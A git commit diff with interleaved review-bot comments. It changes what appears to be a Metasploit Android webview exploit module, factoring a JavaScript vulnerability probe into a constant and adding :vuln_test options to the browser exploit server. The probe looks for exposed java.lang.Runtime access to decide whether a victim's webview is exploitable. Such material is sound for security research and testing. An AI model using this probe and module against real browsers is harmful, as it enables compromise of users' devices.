Adds a :vuln_test option to BES, just like in BAP.

I needed this to run a custom JS check for the Android
webview vuln when the exploit is served straight
through BES. The check already existed when using BAP,
so I tried to preserve that syntax, and also added a
:vuln_test_error as an optional error message.

This commit also does some mild refactoring of un-
useful behavior in BES.
Joe Vennix
2014-10-01 23:34:31 -05:00
parent 0380c5e887
commit 5a8eca8946
3 changed files with 86 additions and 59 deletions
@@ -12,18 +12,20 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Android
VULN_CHECK_JS = %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
autopwn_info(
:os_flavor => 'Android',
:javascript => true,
:rank => ExcellentRanking,
:vuln_test => %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
:vuln_test => VULN_CHECK_JS
)
def initialize(info = {})
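Review bot: the snippet assigned to VULN_CHECK_JS sets `is_vuln` without declaring it, and nothing next to the constant says who provides that variable. Add a comment above `VULN_CHECK_JS = %Q|` stating that the calling harness defines `is_vuln` and reads it after the snippet runs, so that other modules reusing the `:vuln_test` syntax know the contract. The loop variable in `for (i in top) {` is also undeclared, so in non-strict code it ends up as an implicit global in the page; `for (var i in top) {` avoids that. The empty `catch(e) {}` makes any error look the same as "not vulnerable", which is worth noting in the same comment.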
@@ -71,7 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:os_flavor => 'Android'
:os_flavor => 'Android',
:vuln_test => VULN_CHECK_JS,
:vuln_test_error => 'No vulnerable Java objects were found in this web context.'
}
))
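Review bot: `:vuln_test_error` is placed in 'BrowserRequirements' next to `:source` and `:os_flavor`, which are match criteria, while this key is a message string, and the hunk does not show where the string ends up. Please document beside the option handling whether the message is only logged for the operator or is also returned to the requesting browser, and what is reported when a module sets `:vuln_test` but omits `:vuln_test_error`, since the commit message describes the key as optional. Because the check in VULN_CHECK_JS swallows every exception, 'No vulnerable Java objects were found in this web context.' will also be shown when the probe itself failed; wording such as "no vulnerable Java objects were detected" would be more accurate.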